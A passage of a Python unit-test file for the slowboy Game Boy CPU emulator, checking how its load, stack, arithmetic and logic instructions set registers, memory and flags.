def test_ld_imm16addrtoreg8(self):
self.cpu.mmu.set_addr(0xd000, 0xab)
self.cpu.mmu.rom = bytes([0x00, 0xd0])
self.cpu.ld_imm16addrtoreg8('c')()
self.assertEqual(self.cpu.get_reg8('c'), 0xab)
def test_ld_reg16addrtoreg8(self):
self.cpu.set_reg16('hl', 0xd000)
for x in range(256):
self.cpu.mmu.set_addr(0xd000 + x, x)
self.cpu.ld_reg16addrtoreg8('hl', 'c', inc=True)()
self.assertEqual(self.cpu.get_reg8('c'), x)
def test_ld_reg16addrtoreg8_2(self):
self.cpu.set_reg16('hl', 0xd0ff)
for x in range(256):
self.cpu.mmu.set_addr(0xd0ff - x, x)
self.cpu.ld_reg16addrtoreg8('hl', 'c', dec=True)()
self.assertEqual(self.cpu.get_reg8('c'), x)
def test_ld_reg16addrtoreg8_3(self):
with self.assertRaises(ValueError) as cm:
self.cpu.set_reg16('hl', 0xd000)
self.cpu.mmu.set_addr(0xd000, 3)
self.cpu.ld_reg16addrtoreg8('hl', 'c', inc=True, dec=True)()
def test_ld_reg16addrtoreg8_4(self):
self.cpu.set_reg16('hl', 0xd000)
self.cpu.mmu.set_addr(0xd000, 0x53)
self.cpu.ld_reg16addrtoreg8('hl', 'c')()
self.assertEqual(self.cpu.get_reg8('c'), 0x53)
def test_ld_reg16toreg16(self):
self.cpu.set_reg16('hl', 0x7654)
self.cpu.ld_reg16toreg16('hl', 'sp')()
self.assertEqual(self.cpu.sp, 0x7654)
def test_ld_spimm8toregHL(self):
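# HL should become SP plus the imm8 operand; judging by the expected
# 0x7080, the 0x80 operand is applied unsigned here (0x7000 + 0x80).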
self.cpu.sp = 0x7000
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x80])
self.cpu.ld_spimm8toregHL()
self.assertEqual(self.cpu.get_reg16('hl'), 0x7080)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_ld_spimm8toregHL_2(self):
# Make sure carry and half-carry get set
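# (both flags come from the low-byte addition, 0x01 + 0xff)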
self.cpu.sp = 0x7001
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0xff])
self.cpu.ld_spimm8toregHL()
self.assertEqual(self.cpu.get_reg16('hl'), 0x7100)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_ld_sptoimm16addr(self):
self.cpu.sp = 0x1234
self.cpu.mmu.rom = bytes([0x00, 0xd0])
self.cpu.ld_sptoimm16addr()
self.assertEqual(self.cpu.get_pc(), 2)
self.assertEqual(self.cpu.mmu.get_addr(0xd000),
self.cpu.sp >> 8)
self.assertEqual(self.cpu.mmu.get_addr(0xd001),
self.cpu.sp & 0xff)
self.assertEqual(self.cpu.mmu.get_addr(0xd000), 0x12)
self.assertEqual(self.cpu.mmu.get_addr(0xd001), 0x34)
def test_ld_sptoaddr16_2(self):
for x in range(2**10):
self.cpu.sp = x
self.cpu.set_reg16('bc', 0xd000 + 2*x)
self.cpu.ld_sptoreg16addr('bc')()
self.assertEqual(self.cpu.mmu.get_addr(0xd000 + 2*x),
self.cpu.sp >> 8)
self.assertEqual(self.cpu.mmu.get_addr(0xd000 + 2*x + 1),
self.cpu.sp & 0xff)
self.assertEqual(self.cpu.mmu.get_addr(0xd000 + 2*x), x >> 8)
self.assertEqual(self.cpu.mmu.get_addr(0xd000 + 2*x + 1), x & 0xff)
def test_ld_imm8toaddrHL(self):
self.cpu.mmu.rom = bytes([0, 255, 127])
self.cpu.set_reg16('hl', 0xcfff)
self.cpu.ld_imm8toaddrHL()
self.assertEqual(self.cpu.mmu.get_addr(0xcfff), 0)
self.cpu.ld_imm8toaddrHL()
self.assertEqual(self.cpu.mmu.get_addr(0xcfff), 255)
self.cpu.ld_imm8toaddrHL()
self.assertEqual(self.cpu.mmu.get_addr(0xcfff), 127)
def test_ld_imm16toreg16(self):
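# 16-bit immediates are little-endian: low byte first.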
self.cpu.mmu.rom = bytes([0x01, 0x23, 0x45, 0x67, 0x89, 0xab])
self.cpu.ld_imm16toreg16('BC')()
self.cpu.ld_imm16toreg16('DE')()
self.cpu.ld_imm16toreg16('HL')()
self.assertEqual(self.cpu.get_reg16('BC'), 0x2301)
self.assertEqual(self.cpu.get_reg16('DE'), 0x6745)
self.assertEqual(self.cpu.get_reg16('HL'), 0xab89)
def test_push_reg16(self):
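# Push should decrement SP by 2 and store the value little-endian
# (low byte at the lower address).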
self.cpu.set_reg16('sp', 0xc002)
self.cpu.set_reg16('bc', 0x1234)
self.cpu.push_reg16('bc')()
self.assertEqual(self.cpu.sp, 0xc000)
self.assertEqual(self.cpu.mmu.get_addr(0xc001), 0x12)
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x34)
def test_pop_reg16(self):
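# Pop should read the little-endian value back and add 2 to SP.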
self.cpu.set_reg16('sp', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x34)
self.cpu.mmu.set_addr(0xc001, 0x12)
self.cpu.pop_reg16('bc')()
self.assertEqual(self.cpu.sp, 0xc002)
self.assertEqual(self.cpu.get_reg16('bc'), 0x1234)
def test_ldh_regAtoaddr8(self):
# JOYP register---bits 4 and 5 are writable
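# ldh_regAtoaddr8 should write A to 0xff00 + the imm8 operand (0x00 here).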
self.cpu.pc = 0xc000
self.cpu.mmu.set_addr(0xc000, 0x00)
self.cpu.set_reg8('a', 0x30)
self.cpu.ldh_regAtoaddr8()
# Bits 0-3 indicate pressed buttons (active low)
self.assertEqual(self.cpu.mmu.get_addr(0xff00), 0x30 | 0x0f)
def test_ldh_addr8toregA(self):
self.cpu.pc = 0xc000
self.cpu.mmu.set_addr(0xc000, 0x00)
# JOYP register---bits 4 and 5 are writable
self.cpu.mmu.set_addr(0xff00, 0x30)
self.cpu.ldh_addr8toregA()
# Bits 0-3 indicate pressed buttons (active low)
self.assertEqual(self.cpu.get_reg8('a'), 0x30 | 0x0f)
def test_ldh_regAtoaddrC(self):
# JOYP register---bits 4 and 5 are writable
self.cpu.set_reg8('a', 0x30)
self.cpu.set_reg8('c', 0x00)
self.cpu.ldh_regAtoaddrC()
# Bits 0-3 indicate pressed buttons (active low)
self.assertEqual(self.cpu.mmu.get_addr(0xff00), 0x30 | 0x0f)
def test_ldh_addrCtoregA(self):
# JOYP register---bits 4 and 5 are writable
self.cpu.mmu.set_addr(0xff00, 0x30)
self.cpu.set_reg8('c', 0x00)
self.cpu.ldh_addrCtoregA()
# Bits 0-3 indicate pressed buttons (active low)
self.assertEqual(self.cpu.get_reg8('a'), 0x30 | 0x0f)
class TestZ80ALU(unittest.TestCase):
def setUp(self):
self.cpu = slowboy.z80.Z80()
self.cpu.pc = 0
def test_inc_reg8(self):
self.cpu.set_reg8('b', 0x04)
self.cpu.inc_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x05)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_inc_reg8_2(self):
self.cpu.set_reg8('b', 0x0f)
self.cpu.inc_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x10)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_inc_reg8_3(self):
self.cpu.set_reg8('b', 0xff)
self.cpu.inc_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_inc_reg16(self):
self.cpu.set_reg16('bc', 0xeeff)
self.cpu.inc_reg16('bc')()
c = self.cpu.get_carry_flag()
h = self.cpu.get_halfcarry_flag()
s = self.cpu.get_sub_flag()
z = self.cpu.get_zero_flag()
self.assertEqual(self.cpu.get_reg16('bc'), 0xef00)
self.assertEqual(self.cpu.get_carry_flag(), c)
self.assertEqual(self.cpu.get_halfcarry_flag(), h)
self.assertEqual(self.cpu.get_sub_flag(), s)
self.assertEqual(self.cpu.get_zero_flag(), z)
def test_inc_addrHL(self):
# From the Game Boy Programming Manual
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x50)
self.cpu.inc_addrHL()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x51)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_inc_addrHL_2(self):
# Make sure half-carry and zero flags get set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0xff)
self.cpu.inc_addrHL()
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_dec_reg8(self):
self.cpu.set_reg8('b', 0x04)
self.cpu.dec_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x03)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
def test_dec_reg8_2(self):
self.cpu.set_reg8('b', 0x10)
self.cpu.dec_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x0f)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
def test_dec_reg8_3(self):
# Make sure zero flag gets set
self.cpu.set_reg8('b', 0x01)
self.cpu.dec_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
def test_dec_reg8_4(self):
self.cpu.set_reg8('b', 0x00)
self.cpu.dec_reg8('b')()
self.assertEqual(self.cpu.get_reg8('b'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
def test_dec_reg16(self):
self.cpu.set_reg16('bc', 0xee)
self.cpu.dec_reg16('bc')()
self.assertEqual(self.cpu.get_reg16('bc'), 0xed)
def test_dec_addrHL(self):
# Example from the Game Boy Programming Manual
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x00)
self.cpu.dec_addrHL()
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0xff)
def test_dec_addrHL_2(self):
# Make sure zero flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x01)
self.cpu.dec_addrHL()
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.mmu.get_addr(0xc000), 0x00)
def test_add_imm8toreg8(self):
self.cpu.set_reg8('a', 0xaf)
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x11])
self.cpu.add_imm8toreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0xc0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 0)
def test_add_imm8toreg8_2(self):
self.cpu.set_reg8('a', 0xff)
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x01])
self.cpu.add_imm8toreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_add_imm8toreg8_3(self):
self.cpu.set_reg8('a', 0xf0)
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x10])
self.cpu.add_imm8toreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_add_imm8toreg8_4(self):
# add with carry
self.cpu.set_reg8('a', 0xf0)
self.cpu.pc = 0
self.cpu.mmu.rom = bytes([0x10])
self.cpu.set_carry_flag()
self.cpu.add_imm8toreg8('a', carry=True)()
self.assertEqual(self.cpu.get_reg8('a'), 0x01)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 0)
def test_add_imm8toregSP(self):
self.cpu.sp = 0x7000
self.cpu.mmu.rom = bytes([0xfe])
self.cpu.add_imm8toregSP()
self.assertEqual(self.cpu.sp, 0x70fe)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_add_reg16addrtoreg8(self):
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0x11)
self.cpu.set_reg8('a', 0x3f)
self.cpu.add_reg16addrtoreg8('hl', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x50)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_add_reg16addrtoreg8_2(self):
# Make sure carry flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0xd0)
self.cpu.set_reg8('a', 0x3f)
self.cpu.add_reg16addrtoreg8('hl', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x0f)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_add_reg16addrtoreg8_3(self):
# Make sure zero flag gets set
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0xc1)
self.cpu.set_reg8('a', 0x3f)
self.cpu.add_reg16addrtoreg8('hl', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_add_reg16addrtoreg8_4(self):
self.cpu.set_reg16('hl', 0xc000)
self.cpu.mmu.set_addr(0xc000, 0xc0)
self.cpu.set_reg8('a', 0x3f)
self.cpu.add_reg16addrtoreg8('hl', 'a', carry=True)()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 1)
def test_add_imm8toregSP_2(self):
self.cpu.sp = 0x70fe
self.cpu.mmu.rom = bytes([0x02])
self.cpu.add_imm8toregSP()
self.assertEqual(self.cpu.sp, 0x7100)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 0)
def test_add_reg16toregHL(self):
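# For the 16-bit add, the half-carry flag reflects a carry out of bit 11.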
self.cpu.set_reg16('bc', 0xffff)
self.cpu.set_reg16('hl', 0x0001)
self.cpu.add_reg16toregHL('bc')()
self.assertEqual(self.cpu.get_reg16('hl'), 0x0000)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
def test_add_reg16toregHL_2(self):
# Make sure carry and half-carry are not set
self.cpu.set_reg16('bc', 0xffee)
self.cpu.set_reg16('hl', 0x0011)
self.cpu.add_reg16toregHL('bc')()
self.assertEqual(self.cpu.get_reg16('hl'), 0xffff)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
def test_add_reg8toreg8(self):
self.cpu.set_reg8('b', 0xfe)
self.cpu.set_reg8('c', 0x01)
self.cpu.add_reg8toreg8('c', 'b')()
self.assertEqual(self.cpu.get_reg8('b'), 0xff)
self.assertEqual(self.cpu.get_reg8('c'), 0x01)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_add_reg8toreg8_2(self):
"""Example from the Gameboy Programming Manual"""
self.cpu.set_reg8('a', 0x3a)
self.cpu.set_reg8('b', 0xc6)
self.cpu.add_reg8toreg8('b', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_add_reg8toreg8_withcarry(self):
"""Example from the Gameboy Programming Manual"""
# TODO: add a test using (HL)
self.cpu.set_reg8('a', 0xe1)
self.cpu.set_reg8('e', 0x0f)
self.cpu.set_carry_flag()
self.cpu.add_reg8toreg8('e', 'a', carry=True)()
self.assertEqual(self.cpu.get_reg8('a'), 0xf1)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sub_reg8fromreg8(self):
self.cpu.set_reg8('b', 0xff)
self.cpu.set_reg8('c', 0x11)
self.cpu.sub_reg8fromreg8('c', 'b')()
self.assertEqual(self.cpu.get_reg8('c'), 0x11)
self.assertEqual(self.cpu.get_reg8('b'), 0xee)
self.assertEqual(self.cpu.get_carry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.cpu.set_reg8('b', 0x00)
self.cpu.set_reg8('c', 0x01)
self.cpu.sub_reg8fromreg8('c', 'b')()
self.assertEqual(self.cpu.get_reg8('c'), 0x01)
self.assertEqual(self.cpu.get_reg8('b'), 0xff)
self.assertEqual(self.cpu.get_carry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
def test_sub_reg8fromreg8_2(self):
"""Example from the Gameboy Programming Manual"""
self.cpu.set_reg8('a', 0x3e)
self.cpu.set_reg8('e', 0x3e)
self.cpu.sub_reg8fromreg8('e', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sub_reg8fromreg8_3(self):
"""Example from the Gameboy Programming Manual"""
self.cpu.set_reg8('a', 0x3b)
self.cpu.set_reg8('h', 0x2a)
self.cpu.sub_reg8fromreg8('h', 'a', carry=True)()
self.assertEqual(self.cpu.get_reg8('a'), 0x10)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sub_imm8fromreg8(self):
"""Example from the Gameboy Programming Manual"""
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.rom = bytes([0x0f])
self.cpu.sub_imm8fromreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x2f)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sub_imm8fromreg8_2(self):
# Make sure zero flag gets set
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.rom = bytes([0x3e])
self.cpu.sub_imm8fromreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sub_imm8fromreg8_3(self):
# Make sure carry flag gets set
self.cpu.set_reg8('a', 0x00)
self.cpu.mmu.rom = bytes([0x3e])
self.cpu.sub_imm8fromreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0xc2)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sub_imm8fromreg8_4(self):
self.cpu.set_reg8('a', 0x00)
self.cpu.mmu.rom = bytes([0x3e])
self.cpu.set_carry_flag()
self.cpu.sub_imm8fromreg8('a', carry=True)()
self.assertEqual(self.cpu.get_reg8('a'), 0xc1)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sub_imm16addrfromreg8(self):
"""Example from the Gameboy Programming Manual"""
u8 = self.cpu.get_reg8('a')
self.cpu.mmu.rom = bytes([0x00, 0xc0])
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.set_addr(0xc000, 0x40)
self.cpu.sub_imm16addrfromreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0xfe)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sub_imm16addrfromreg8_2(self):
# Make sure the zero flag gets set
u8 = self.cpu.get_reg8('a')
self.cpu.mmu.rom = bytes([0x00, 0xc0])
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.set_addr(0xc000, 0x3e)
self.cpu.sub_imm16addrfromreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sub_imm16addrfromreg8_3(self):
# Make sure the half-carry flag gets set
self.cpu.mmu.rom = bytes([0x00, 0xc0])
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.set_addr(0xc000, 0x3f)
self.cpu.sub_imm16addrfromreg8('a')()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sub_imm16addrfromreg8_4(self):
# Make sure the half-carry flag gets set
u8 = self.cpu.get_reg8('a')
self.cpu.mmu.rom = bytes([0x00, 0xc0])
self.cpu.set_carry_flag()
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.set_addr(0xc000, 0x3e)
self.cpu.sub_imm16addrfromreg8('a', carry=True)()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sub_reg16addrfromreg8(self):
"""Example from the Gameboy Programming Manual"""
addr16 = 0xc000
self.cpu.set_reg16('hl', addr16)
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.set_addr(addr16, 0x40)
self.cpu.sub_reg16addrfromreg8('hl', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0xfe)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sub_reg16addrfromreg8_2(self):
# Make sure the zero flag gets set
addr16 = 0xc000
self.cpu.set_reg16('hl', addr16)
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.set_addr(addr16, 0x3e)
self.cpu.sub_reg16addrfromreg8('hl', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 0)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_sub_reg16addrfromreg8_3(self):
# Make sure the half-carry flag gets set
addr16 = 0xc000
self.cpu.set_reg16('hl', addr16)
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.set_addr(addr16, 0x3f)
self.cpu.sub_reg16addrfromreg8('hl', 'a')()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_sub_reg16addrfromreg8_4(self):
addr16 = 0xc000
self.cpu.set_reg16('hl', addr16)
self.cpu.set_reg8('a', 0x3e)
self.cpu.mmu.set_addr(addr16, 0x3e)
self.cpu.sub_reg16addrfromreg8('hl', 'a', carry=True)()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 1)
self.assertEqual(self.cpu.get_carry_flag(), 1)
def test_and_reg8(self):
self.cpu.set_reg8('a', 0xaa)
self.cpu.set_reg8('b', 0x55)
self.cpu.and_reg8('b')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_and_reg8_2(self):
self.cpu.set_reg8('a', 0xff)
self.cpu.set_reg8('l', 0x55)
self.cpu.and_reg8('l')()
self.assertEqual(self.cpu.get_reg8('a'), 0x55)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_and_imm8(self):
self.cpu.set_reg8('a', 0xaa)
self.cpu.mmu.rom = bytes([0x55])
self.cpu.and_imm8()()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_and_imm8_2(self):
self.cpu.set_reg8('a', 0xff)
self.cpu.mmu.rom = bytes([0x55])
self.cpu.and_imm8()()
self.assertEqual(self.cpu.get_reg8('a'), 0x55)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_and_reg16addr(self):
addr16 = 0xc000
self.cpu.set_reg8('a', 0xaa)
self.cpu.mmu.set_addr(addr16, 0x55)
self.cpu.set_reg16('bc', addr16)
self.cpu.and_reg16addr('bc')()
self.assertEqual(self.cpu.get_reg8('a'), 0x00)
self.assertEqual(self.cpu.get_zero_flag(), 1)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_and_reg16addr_2(self):
# Make sure the zero flag is not set
addr16 = 0xc000
self.cpu.set_reg8('a', 0xa1)
self.cpu.mmu.set_addr(addr16, 0x55)
self.cpu.set_reg16('bc', addr16)
self.cpu.and_reg16addr('bc')()
self.assertEqual(self.cpu.get_reg8('a'), 0x1)
self.assertEqual(self.cpu.get_zero_flag(), 0)
self.assertEqual(self.cpu.get_halfcarry_flag(), 1)
self.assertEqual(self.cpu.get_sub_flag(), 0)
self.assertEqual(self.cpu.get_carry_flag(), 0)
def test_or_reg8(self):
self.cpu.set_reg8('a', 0xaa)
self.cpu.set_reg8('b', 0x55)
self.cpu.or_reg8('b')()
self.assertEqual(self.cpu.get_reg8('a'), 0xff)
self.assertEqual(self.cpu.get_reg8('b'), 0x55)
